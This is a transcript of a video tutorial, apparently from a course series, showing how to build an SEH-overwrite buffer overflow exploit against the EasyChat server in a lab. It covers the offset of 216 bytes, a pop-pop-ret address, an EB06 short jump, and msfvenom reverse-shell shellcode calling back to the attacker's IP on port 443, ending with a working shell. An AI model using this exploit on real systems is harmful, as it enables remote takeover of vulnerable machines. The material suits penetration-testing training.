Hello everyone, welcome to the video series of buffer overflow exploits. In last three videos, we saw pure vanilla based buffer overflows wherein we were able to control the program execution with the help of jump ESP. Now in this video, we will see if developer has written a code to handle the exceptions. In that case, we will not be able to override EIP and ESP. Then how we need to bypass these conditions, that we will see in this video. So for this video, I have an application installed on my XP machine, which is EasyChat server. Let me start this application and bind the application with Immunity Debugger. Click on attach and bind the process. So EasyChat process is now attached with Immunity Debugger. Let me run the program. So let me search for an exploit in database. So there is an exploit available, this 8142.py. This is a Python script. Let me copy this. Then Windows remote and 8142.py. So let me name this as the same file. So if you open this file, I could see a lot of things. So let me remove everything and we'll start with the basic script. So some comment section I have deleted. So two classes are imported, let it be. Then we will start with sending junk characters. Then payload I have removed, this comment section too. So by looking at this field, head field, attacker is sending junk characters against username and password. So I'm assuming vulnerability is there either in the username and password field. So we'll keep that as it is. And then change the IP address here. So in my case, IP address is 192.168.1.112. So I'll specify that here. So we have a plain script ready, and instead of sending these 216 A's, we will send, let's say we will start with 2000 A's. So when this get request will go for the username and password field, there will be 2000 A's the script will send to the application, and we should see application is getting crashed. So let me save the script, verify that in Immunity Debugger, okay, and then run the script. Some problem, so it says connection is refused. So it says server has stopped because of the 30-minute limitation of evaluation version. Okay, let me restart the application. So click on detach, start the application. Perfect. Go to Immunity Debugger and bind the process. Awesome. And then run the script. So I have run the script. I don't see data here. Let me try again. Let me see if the IP address is right or not. So we should see application is getting crashed. So 192.168.1.112 is the IP address. Perfect. Let me verify the script. So it says import structure and socket 2000 A's, and then get request for the chat group, and username will be sent 2000 A's, password will be sent 2000 A's. Then application 192.168.1. So application so code looks okay. We should see it is getting crashed. Let me try again. Okay, let me basically exit the debugger, restart the application, and exit. Start it again. So I have restarted the application. Go to debugger, attach the process, and run the application. Go back to Kali machine, run the script, and I can see now application is getting crashed. But interestingly, we don't see junk characters, we don't see our age has overwritten EIP. So in last few videos you were able to see the moment application gets crashed, we were able to control the EIP register. But here EIP register is not being overwritten. So now it says access violation when reading 41, 41, 41, and then it says use shift F7, F8, F9 to press exception to the program. So let me press shift F7 and then try to run the program. The moment I run the program after passing that exception, now I can see EIP has been overwritten using 4A's, which is 41, 41, 41, 41. So problem here is we have a exception handler before this EIP is being overwritten by 4A's. So if you go to view, click on SE chain, and if you click on this handler and go to the stack, let me try that again. Should go to follow address in stack, maximize this, and if you see the handler, basically the memory address where this SEH sits has been overwritten by 4H, and then the next 4 bytes, which is a exception handler, that is also being overwritten by 4H. Now we need to bypass this condition. So now let's see how we can bypass this condition and then jump over to the EIP register. So basic step wherein we need to identify out of those 2000 bytes at which specific byte this is being overwritten. So that we have seen in last few videos. So we will use a Metasploit script, user share Metasploit framework, tools, exploit, and then create pattern. Pattern create, and length is 2000. Meanwhile, let me restart the application. Go to debug, restart it, and run it. Copy this, go to our script, and instead of age, now I want to send these 2000 unique characters. Run the script. Application is getting crashed. Go to view, SE chain, right click, and follow address in stack. So we could see AH2A and H3AH. These 4 bytes has overwritten my record where exception SE is there, and then H3AH has overwritten where the handler is located. So let me see at which byte this has been overwritten. So instead of pattern create, we will use pattern offset and AH2A. So at 216 bytes this has been overwritten, and if I see the next 4 bytes, I should get 220 bytes as a response. Awesome. So go to, let's verify this again. Let me delete this. Send A's, which is 216, then send B's 4. So SE record should be overwritten by 4 B's now. Then C for the handler address. So send 4 C's, and then let's send A again. This will be the place where our actual payload will go in, and 2000 minus 216 minus 4 minus 4. Save the script, restart application, run it, and execute the script again. Now we should see perfect 43 43 43. Our handler has been overwritten by 4 C's. So right click, follow address in stack, and I can see now the SE record is being overwritten by 4 B's, and then handler is being overwritten by 4 C's, and then our payload starts again with 41 41 41. So when the program execution comes to this point where 42 42 42 42 is there, we need to jump the code to 41 so that handler should not handle the exception. So there is a opcode for that, which is EB, and we need to jump the address to 6 bytes. How we can do that? So earlier we were identifying jump ESP. Now in this case we need to identify pop-up ret statement commands. So go to modules. So this program does load this DLL, so you need to do basic checks like we have done in last videos where dep ASLR options are disabled. So right click here, go to search for and then sequence of commands, pop, and then return. Click on find, and I could see a pop-up return statement here, but the memory address is using 00, which is a null character, and that is most of the cases a bad character in the application. So we need to find a memory address which doesn't have this 00 in the memory address. So to search similar statements, use Control L. So still I could see 00 in the memory location. So let me find a suitable one. Okay, we should see the moment. Okay, so here it is. So 1001104 BC. So let me copy this, copy to clipboard, and I'll save that in Notepad because this will be used at later stage, this address. So 1001104 BC. Perfect. Now go to the script again, nano8142.py. Now instead of 4 B's, I want to jump the code. So opcode for that is EB. How many bytes you want to jump? 6 bytes. Because if you see in the immunity debugger, so EB will take 2 bytes and 2 bytes for this, and then 4 bytes for the handler. So I need to jump my code to 6 bytes. So EB06, and then to complete this structure, I will send 2 knobs. Perfect. So this opcode will jump the execution to 6 bytes. Now change C's with memory address pop-up ret, which we have identified. So BC 040110, PC 04 PC 040110 01 and then 10 and then again ace. Okay, save this, restart the application. Okay, so copy this address and have a breakpoint on this memory address. So, okay, we have this memory address here, right click and do a breakpoint. Okay, so application is running, we have our breakpoint configured, run the script. Application is crashed, so we should see SEH has been written with EB069090. Let's see that. So EB069090 and then handler is being overwritten by the memory address. Perfect. So let's see what exactly happens now. So let me pass the exception by pressing Shift F7 and run the program. The moment I'll run the program, I should see a breakpoint. I have run the program. I can see now the breakpoint has reached. Pop, pop, return. Now I will execute all the instructions one by one. So let's press this button. I could see next instruction, then next instruction, and then I should see a execution is back on EB, which is the shortcut for the, which is the opcode for the short jump. So the moment I press this button again, I'm back on EB06. Now it says it is a short jump opcode and it will take a jump 6 bytes. So 1, 2 and these 4 bytes. Let's run it again and now I'm on Ace where I can have my payload placed. So I'm able to control here program execution with the help of pop pop ret statement and with the help of short jump of 6 bytes. Now generate a payload. In fact, you need to see what all bad characters will be there in the application, so I'm not going to cover that in this video. You guys know how you can identify the bad characters. So let me generate a payload, MSF Venome, and in fact let me first verify my IP address. 111 MSF Venome -p Windows shell reverse _ TCP. Lhost is 192.168.1.111. L port 443. Bad characters I have already identified, so you need to try this. And then format as C. Okay. Copy this. Start the handler. So copy this to program. So specify shell as new variable parameter and then let me close it with double quotes. Perfect. So instead of A, so I will send few knobs, for example 10, and then shell. Awesome. So save the script. So my shell code starts from BABC6X. Perfect. So let me restart the application. Debug, restart it. Let's see if we are able to hit to our payload. Restart. And run the, have a breakpoint configured again. Right click. Breakpoint. Awesome. Run the script. Press Shift F7 to pass the exception. Run the program again. I have my breakpoint. Run the program using one by one instructions. So pop red, and then I should see a back EB instruction. So short jump, and short jump will move to knobs. So I'm on the knobs. 1 2 3 4 5 6 7 8 9 10, and now I have my payload here, BC66 and then 85. So I can see my payload will be executed. So exit this. Let's test now. Run the handler. Restart the application. This time debugger is not required. Okay, I need to have another session. Python 8142.py, and awesome, I have a shell. ipconfig, you are on 192.168.1.2 machine, so we were able to jump, we were able to take the program, we were able to control the program execution, and now we have a shell. Thank you very much for watching this video, and I hope you are enjoying this video series from Troika System. Thank you.